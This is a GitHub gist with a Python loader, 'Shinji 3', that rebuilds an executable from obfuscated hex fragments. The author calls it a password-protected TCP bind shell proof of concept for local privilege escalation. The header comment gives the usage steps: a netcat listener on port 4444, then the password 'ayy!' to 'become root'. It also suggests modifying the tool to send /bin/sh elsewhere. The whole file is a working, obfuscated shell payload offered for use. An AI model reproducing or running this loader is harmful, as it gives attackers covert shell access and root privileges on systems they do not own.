Last active
October 24, 2017 00:43
-
-
Save netspooky/5900bda7a477537cb5cff129cf0384e0 to your computer and use it in GitHub Desktop.
Shinji 3
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import binascii, subprocess | |
###################################################### | |
# Shinji 3 is a proof of concept password protected # | |
# TCP Bind Shell binary. This one only works on # | |
# localhost, but you could modify to send /bin/sh # | |
# wherev, or use for local priv esc (: # | |
# # | |
# First create a listener $ nc -lvp 4444 # | |
# Then run the loader + binary # | |
# Then type the password 'ayy!' to become root. # | |
###################################### ############# | |
hl = [ '0000','002e','0100', # # | |
'0200','0201','0202','0266', # | |
'0300','0421','0424','0500','0550', | |
'05c6','05e8','0600','0750','0801', | |
'0a5f','0b00','0f05','1000','10b0', | |
'1100', '115c', '2000','2001', | |
'2154', '2402', '2404','270f', | |
'2a0f', '2f62', '2f73','2f80', | |
'31c0', '3800', '3b0f','3e00', | |
'4000','4831','4883','48d1', | |
'4c46','5050','5059','505a', | |
'505f','5148','515e', | |
'545e','545f','5758', # H: 86 | |
'59e2', | |
'5a04','5e48','5e5f', | |
'6162','6841', '6861', | |
'696e', | |
'7274', | |
'7368','7374', | |
'7465', '7874','7979', | |
'7dfe', '7f45','8000', | |
'80c2', '8144','8800', | |
'8847', 'a775','b002', | |
'c050', 'c102','c744', | |
'e901','e903','ea0c','ee04', | |
'efeb', 'f1ff','fdfe', | |
'ffff'] # I: 240 | |
il = [ 67,42,4,2,0,0,0,0,3,37,2,0, | |
68,38,0,0,38,0,0,0,25,0,0,0,0,0, | |
38,35,2,38,7,3,2,0,10,0,0,0,0,0,0, | |
38,0,0,0,38,0,0,16,0,0,0,16,0,0,0,0, | |
24,0,0, 0, 0,0,0,39,75,43,45,74,43,55, | |
41,81, 29,12,9,6,77, 27,23,77,28, | |
66,84, 70,28,5,5,49, 46,69,21,30, | |
11,49,40,80,19,44,51,40,79,50,58,65,26, | |
54,73,33,76,46,47,34,40,78,48,8,19,52,82, | |
17,72,15,53,36,13,83,85,31,59,32,57,1,61,62, | |
60,56,1, 63, 64,0, 0,0, 0,0,0,0,0,0,0,0, | |
0,0, 0,0,0,0,0,0,0,0, | |
0,0,0,0,0,0,0,0,0,0, | |
0, 0, 0, 0,0,18,0,2,0,14,0,0,0, | |
68,38,0,0,68,0,0,0,71,0,0,0,0,0,0,0,20,0,0, | |
0,0,0,0,0,2,0,7,0,0,0,0,0,0,0,0,0,16,0,0,0,22, | |
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0 ] | |
m = "shinji3" | |
with open(m, 'wb') as f: | |
for i in il: | |
ww = binascii.a2b_hex(''.join(hl[i])) | |
f.write(ww) | |
subprocess.Popen(['/bin/chmod','+x','shinji3']) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment